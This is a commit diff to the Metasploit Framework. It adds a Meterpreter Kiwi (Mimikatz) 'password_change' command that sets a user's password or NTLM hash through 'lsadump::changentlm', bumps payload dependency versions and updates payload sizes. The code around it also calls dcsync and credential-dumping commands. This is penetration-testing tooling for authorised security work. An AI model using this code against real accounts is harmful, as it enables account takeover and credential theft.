Land rapid7#8549, Update to Mimikatz 2.1.1 20170608 for changentlm function

Author: Brent Cook

.ruby-version

@@ -1 +1 @@
-2.4.1
+2.4.0

Gemfile.lock

@@ -15,7 +15,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.2.33)
+      metasploit-payloads (= 1.2.35)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.1.10)
       msgpack
@@ -196,7 +196,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.2.33)
+    metasploit-payloads (1.2.35)
     metasploit_data_models (2.0.14)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)

lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb

@@ -53,6 +53,43 @@ def exec_cmd(cmd)
     output[output.index("\n") + 1, output.length]
   end
 
+  def password_change(opts)
+    cmd = "lsadump::changentlm /user:#{opts[:user]}"
+    cmd << " /server:#{opts[:server]}" if opts[:server]
+    cmd << " /oldpassword:#{opts[:old_pass]}" if opts[:old_pass]
+    cmd << " /oldntlm:#{opts[:old_hash]}" if opts[:old_hash]
+    cmd << " /newpassword:#{opts[:new_pass]}" if opts[:new_pass]
+    cmd << " /newntlm:#{opts[:new_hash]}" if opts[:new_hash]
+
+    output = exec_cmd("\"#{cmd}\"")
+    result = {}
+
+    if output =~ /^OLD NTLM\s+:\s+(\S+)\s*$/m
+      result[:old] = $1
+    end
+    if output =~ /^NEW NTLM\s+:\s+(\S+)\s*$/m
+      result[:new] = $1
+    end
+
+    if output =~ /^ERROR/m
+      result[:success] = false
+      if output =~ /^ERROR.*SamConnect/m
+        result[:error] = 'Invalid server.'
+      elsif output =~ /^ERROR.*Bad old/m
+        result[:error] = 'Invalid old password or hash.'
+      elsif output =~ /^ERROR.*SamLookupNamesInDomain/m
+        result[:error] = 'Invalid user.'
+      else
+        STDERR.puts(output)
+        result[:error] = 'Unknown error.'
+      end
+    else
+      result[:success] = true
+    end
+
+    result
+  end
+
   def dcsync(domain_user)
     exec_cmd("\"lsadump::dcsync /user:#{domain_user}\"")
   end

lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb

@@ -38,7 +38,7 @@ def initialize(shell)
     super
     print_line
     print_line
-    print_line("  .#####.   mimikatz 2.1.1-20170409 (#{client.session_type})")
+    print_line("  .#####.   mimikatz 2.1.1 20170608 (#{client.session_type})")
     print_line(" .## ^ ##.  \"A La Vie, A L'Amour\"")
     print_line(" ## / \\ ##  /* * *")
     print_line(" ## \\ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )")
@@ -72,6 +72,7 @@ def commands
       'kerberos_ticket_list'  => 'List all kerberos tickets (unparsed)',
       'lsa_dump_secrets'      => 'Dump LSA secrets (unparsed)',
       'lsa_dump_sam'          => 'Dump LSA SAM (unparsed)',
+      'password_change'       => 'Change the password/hash of a user',
       'wifi_list'             => 'List wifi profiles/creds for the current user',
       'wifi_list_shared'      => 'List shared wifi profiles/creds (requires SYSTEM)',
     }
@@ -82,6 +83,92 @@ def cmd_kiwi_cmd(*args)
     print_line(output)
   end
 
+  #
+  # Valid options for the password change feature
+  #
+  @@password_change_usage_opts = Rex::Parser::Arguments.new(
+    '-h'  => [false, 'Help banner'],
+    '-u'  => [true,  'User name of the password to change.'],
+    '-s'  => [true,  'Server to perform the action on (eg. Domain Controller).'],
+    '-op' => [true,  'The known existing/old password (do not use with -oh).'],
+    '-oh' => [true,  'The known existing/old hash (do not use with -op).'],
+    '-np' => [true,  'The new password to set for the account (do not use with -nh).'],
+    '-nh' => [true,  'The new hash to set for the account (do not use with -np).']
+  )
+
+  def cmd_password_change_usage
+    print_line('Usage password_change [options]')
+    print_line
+    print_line(@@password_change_usage_opts.usage)
+  end
+
+  def cmd_password_change(*args)
+    if args.length == 0 || args.include?('-h')
+      cmd_password_change_usage
+      return
+    end
+
+    opts = {}
+
+    @@password_change_usage_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-u'
+        opts[:user] = val
+      when '-s'
+        opts[:server] = val
+      when '-op'
+        opts[:old_pass] = val
+      when '-oh'
+        opts[:old_hash] = val
+      when '-np'
+        opts[:new_pass] = val
+      when '-nh'
+        opts[:new_hash] = val
+      end
+    }
+
+    valid = true
+    if opts[:old_pass] && opts[:old_hash]
+      print_error('Options -op and -oh cannot be used together.')
+      valid = false
+    end
+
+    if opts[:new_pass] && opts[:new_hash]
+      print_error('Options -np and -nh cannot be used together.')
+      valid = false
+    end
+
+    unless opts[:old_pass] || opts[:old_hash]
+      print_error('At least one of -op and -oh must be specified.')
+      valid = false
+    end
+
+    unless opts[:new_pass] || opts[:new_hash]
+      print_error('At least one of -np and -nh must be specified.')
+      valid = false
+    end
+
+    unless opts[:user]
+      print_error('The -u parameter must be specified.')
+      valid = false
+    end
+
+    if valid
+
+      unless opts[:server]
+        print_status('No server (-s) specified, defaulting to localhost.')
+      end
+
+      result = client.kiwi.password_change(opts)
+
+      if result[:success] == true
+        print_good("Success! New NTLM hash: #{result[:new]}")
+      else
+        print_error("Failed! #{result[:error]}")
+      end
+    end
+  end
+
   def cmd_dcsync(*args)
     return unless check_is_domain_user
 

metasploit-framework.gemspec

@@ -68,7 +68,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.2.33'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.2.35'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10'
   # Needed by msfgui and other rpc components

modules/payloads/singles/php/meterpreter_reverse_tcp.rb

@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 27727
+  CachedSize = 27602
 
   include Msf::Payload::Single
   include Msf::Payload::Php::ReverseTcp

modules/payloads/singles/python/meterpreter_bind_tcp.rb

@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 54306
+  CachedSize = 54142
 
   include Msf::Payload::Single
   include Msf::Payload::Python

modules/payloads/singles/python/meterpreter_reverse_http.rb

@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 54270
+  CachedSize = 54106
 
   include Msf::Payload::Single
   include Msf::Payload::Python

modules/payloads/singles/python/meterpreter_reverse_https.rb

@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 54270
+  CachedSize = 54106
 
   include Msf::Payload::Single
   include Msf::Payload::Python

modules/payloads/singles/python/meterpreter_reverse_tcp.rb

@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 54222
+  CachedSize = 54058
 
   include Msf::Payload::Single
   include Msf::Payload::Python